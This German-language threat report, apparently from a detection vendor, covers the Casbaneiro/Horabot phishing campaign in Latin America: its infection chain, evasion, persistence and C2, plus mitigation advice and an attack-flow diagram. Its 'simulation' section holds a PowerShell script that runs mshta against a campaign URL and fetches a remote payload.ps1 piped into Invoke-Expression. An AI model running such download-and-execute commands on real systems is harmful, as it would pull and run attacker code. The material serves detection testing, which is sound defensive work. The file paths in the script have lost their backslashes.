Entschlüsselung der mehrgleisigen Casbaneiro-Kampagnen des Augmented Marauder

Ruslan Mikhalov Leiter der Bedrohungsforschung bei SOC Prime

Folgen

Entschlüsselung der mehrgleisigen Casbaneiro-Kampagnen des Augmented Marauder

Detection stack

AIDR
Alert
ETL
Query

Bedrohungsbericht
Angriffsablauf
Erkennungen
Simulationen

Ermittlung

Forscher rekonstruierten die End-to-End-Kette von der anfänglichen Anhängseldatei bis zur Ausführung der endgültigen Nutzlast. Sie analysierten eine HTA-Phase, die mshta.exe auslöst, gefolgt von einem zweistufigen JavaScript/VBScript-Loader und AutoIT-Komponenten, die verwendet werden, um AES-verschlüsselte Container mit einem hartcodierten Seed-Wert zu entschlüsseln. Statische Analysen bestätigten die Präsenz von Horbot- und Casbaneiro-Binärdateien sowie Anti-Analyse-Logik, die auf Sandbox-Benutzernamen und VM-relevante Artefakte überprüft. Netzwerkbeobachtungen zeigten C2-Infrastruktur, die durch Cloudflare-geschützte Domains und eine PHP-API zur Generierung dynamischer, opferspezifischer PDFs während der Bereitstellungsphase geschützt war.

Minderung

Blockieren oder streng kontrollieren Sie die Ausführung von mshta.exe für nicht vertrauenswürdige Inhalte und verstärken Sie die Inspektion von Anhängseldateien für ZIP/HTA/script-basierte Ketten. Überwachen Sie auffälliges PowerShell-Verhalten, das mit Outlook COM-Objekten interagiert, was auf eine mailboxgesteuerte Verbreitung hinweisen kann. Auf der Netzwerkebene blockieren oder alarmieren Sie bei identifizierten bösartigen Domains und IP-Adressen und wenden URL-Filterung an, um den Zugang zu PDF-Generierungsdiensten zu beschränken, die für die Vorbereitung genutzt werden. Verwenden Sie Anwendungs-Whitelist, um die Ausführung von AutoIT-Interpretern ohne ausdrückliche Genehmigung zu verhindern.

Antwort

Wenn Aktivität erkannt wird, isolieren Sie den Endpunkt, stoppen Sie verdächtige mshta.exe- und PowerShell-Prozesse und entfernen Sie neu erstellte Artefakte, insbesondere Dateien, die in öffentlichen Verzeichnissen abgelegt wurden. Sammeln Sie die HTA-, VBS- und AutoIT-Stufen zur forensischen Untersuchung und suchen Sie dann nach staticdata.dll und at.dll auf betroffenen Hosts. Setzen Sie Zugangsdaten für kompromittierte E-Mail-Konten zurück, deaktivieren Sie bösartige Outlook COM-Automatisierung oder Regeln, und aktualisieren Sie die Erkennungsinhalte mit extrahierten IoCs, während Sie die seitliche Verbreitung und anschließendes Phishing aus gekaperten Posteingängen beobachten.

Schlüsselbegriffe: Augmented Marauder, Water Saci, Casbaneiro, Horbot, Lateinamerika, Spanisches Phishing, WhatsApp-Köder, ClickFix, HTA, mshta.exe, VBScript, JavaScript-Loader, AutoIT, PowerShell, Outlook COM, AES-Entschlüsselung, UUID ZIP, passwortgeschütztes PDF, Cloudflare C2, PHP API, Banking-Trojaner, Übernahme von E-Mail-Konten.

"graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#e6e6e6 classDef process fill:#ffdd99 classDef malware fill:#ff9999 classDef persistence fill:#ccffcc classDef c2 fill:#ffcc99 classDef operator fill:#ff9900 %% Node definitions action_phish_attach["Aktion – T1566.001 Phishing: Spearphishing-Anhang Bösartige E-Mail mit passwortgeschütztem PDF verkleidet als gerichtliche Vorladung"] class action_phish_attach action action_phish_link["Aktion – T1566.002 Phishing: Spearphishing-Link Link im PDF löst automatischen Download einer ZIP-Datei mit zufälligem UUID-Namen aus"] class action_phish_link action file_zip["Datei – ZIP-Archiv Enthält HTA-Datei"] class file_zip file file_hta["Datei – HTA-Datei Ausgeführt über mshta.exe"] class file_hta file process_mshta["Prozess – mshta.exe Lädt JavaScript, das das zweite VBScript lädt"] class process_mshta process script_vb["Aktion – T1059.005 Befehl und Skript-Interpreter: Visual Basic Sandbox-Tests und Payload-Download"] class script_vb malware action_sandbox_evasion["Aktion – T1497.002 Virtualisierungs-/Sandbox-Ausweichmanöver Benutzeraktivitätsbasierte Überprüfungen auf Sandbox-Benutzernamen und VM-Artefakte"] class action_sandbox_evasion action action_deobfuscation["Aktion – T1140 Dateien oder Informationen entschlüsseln/deobfuskieren Laufzeit-Deobfuskierung von Zeichenketten und Code"] class action_deobfuscation action script_powershell["Aktion – T1059.001 Befehl und Skript-Interpreter: PowerShell Lädt AutoIT-Interpreter herunter und erntet Outlook-Kontakte"] class script_powershell malware tool_outlook["Werkzeug – Outlook COM-Objekte Adressbuch für E-Mail-Verbreitung abkratzen"] class tool_outlook tool tool_autoit["Werkzeug – AutoIT Kompilierte Skripte erzeugen verschlüsselte Payloads"] class tool_autoit tool action_compile["Aktion – T1027.004 Verdeckte Dateien oder Informationen: Kompilierung nach Lieferung Payloads werden vor der Ausführung auf dem Host kompiliert"] class action_compile action malware_dll["Malware – Verschlüsselte DLLs (staticdata.dll, at.dll)"] class malware_dll malware process_reflect_load["Prozess – Reflexives DLL-Laden Lädt DLLs direkt in den Speicher, ohne sie auf die Festplatte zu schreiben"] class process_reflect_load process action_injection["Aktion – T1055.001 Prozessinjektion: DLL-Injektion Reflexartig geladene DLLs werden in Prozesse injiziert"] class action_injection action persistence_shortcut["Persistenz – T1547.009 Verknüpfungsänderung LNK im Autostart-Ordner platziert"] class persistence_shortcut persistence c2_communication["C2 – T1102 Web-Service HTTP GET/POST über Cloudflare-geschützte Domains"] class c2_communication c2 tool_turo["Werkzeug – Turo.exe (AutoIT-kompiliert)"] class tool_turo tool tool_tekojac["Werkzeug – Tekojac.exe (Auto2Exe)"] class tool_tekojac tool action_masquerade["Aktion – T1036.008 Maskierung PDF- und ZIP-Dateien erscheinen legitim"] class action_masquerade action %% Connections action_phish_attach –>|liefert| file_zip file_zip –>|enthält| file_hta file_hta –>|ausgeführt von| process_mshta process_mshta –>|lädt| script_vb script_vb –>|führt aus| action_sandbox_evasion action_sandbox_evasion –>|führt zu| action_deobfuscation action_deobfuscation –>|enthüllt| script_powershell script_powershell –>|verwendet| tool_outlook script_powershell –>|lädt herunter| tool_autoit tool_autoit –>|produziert| action_compile action_compile –>|erzeugt| malware_dll malware_dll –>|geladen von| process_reflect_load process_reflect_load –>|ermöglicht| action_injection action_injection –>|injiziert in| process_mshta action_injection –>|ermöglicht| persistence_shortcut persistence_shortcut –>|erhält| c2_communication script_powershell –>|lädt herunter| tool_turo script_powershell –>|lädt herunter| tool_tekojac action_masquerade –>|deckt| action_phish_attach action_masquerade –>|deckt| action_phish_link %% Styling class action_phish_attach action class action_phish_link action class file_zip file class file_hta file class process_mshta process class script_vb malware class action_sandbox_evasion action class action_deobfuscation action class script_powershell malware class tool_outlook tool class tool_autoit tool class action_compile action class malware_dll malware class process_reflect_load process class action_injection action class persistence_shortcut persistence class c2_communication c2 class tool_turo tool class tool_tekojac tool class action_masquerade action "

Angriffsfluss

Ansehen

Simulation der Ausführung

Voraussetzung: Die Telemetrie- und Basislinien-Vorflugprüfung muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Angreifertechnik (TTP), die das Erkennungsregel auslösen soll. Die Befehle und die Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, genau die erwartete Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder nicht verwandte Beispiele führen zu Fehldiagnosen.

Angriffsnarrativ & Befehle:
Der Bedrohungsakteur zielt darauf ab, einen Fuß in der Tür auf einem Opfer-Arbeitsplatz zu etablieren, indem er Mshta verwendet, um eine bösartige HTA-Nutzlast von https://ge.factu.it.com/GZSPEGIJ/YFSBNPQKherunterzuladen und auszuführen. Unmittelbar danach nutzt der Akteur PowerShell , um ein zweites Skript von derselben Domain herunterzuladen über Invoke‑WebRequest und führt es im Speicher aus. Beide Binärdateien werden von einem erhöhten Eingabeaufforderungsfenster gestartet, um die Wahrscheinlichkeit des Audit-Loggings zu erhöhen.

Regressionstest-Skript:

# Horabot-Simulation - löst sowohl mshta als auch PowerShell in derselben Sitzung aus
# 1. Mshta mit bösartigem URL starten
$htaUrl = "https://ge.factu.it.com/GZSPEGIJ/YFSBNPQK"
Start-Process -FilePath "$env:SystemRootsystem32mshta.exe" -ArgumentList $htaUrl -WindowStyle Hidden

# 2. PowerShell starten, um ein entferntes Skript herunterzuladen und auszuführen
$psUrl = "https://ge.factu.it.com/GZSPEGIJ/YFSBNPQK/payload.ps1"
Start-Process -FilePath "$env:SystemRootSystem32WindowsPowerShellv1.0powershell.exe" `
    -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Invoke-WebRequest -Uri '$psUrl' -UseBasicParsing | Invoke-Expression`"" `
    -WindowStyle Hidden

Aufräumbefehle:

# Beenden Sie alle verbleibenden bösartigen Prozesse (falls sie überlebt haben)
Get-Process -Name mshta, powershell -ErrorAction SilentlyContinue | Stop-Process -Force

# Entfernen Sie alle Dateien, die möglicherweise abgelegt wurden (Beispielstandorte)
$paths = @(
    "$env:TEMPpayload.ps1",
    "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupmalicious.hta"
)
foreach ($p in $paths) {
    if (Test-Path $p) { Remove-Item -Path $p -Force }
}

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten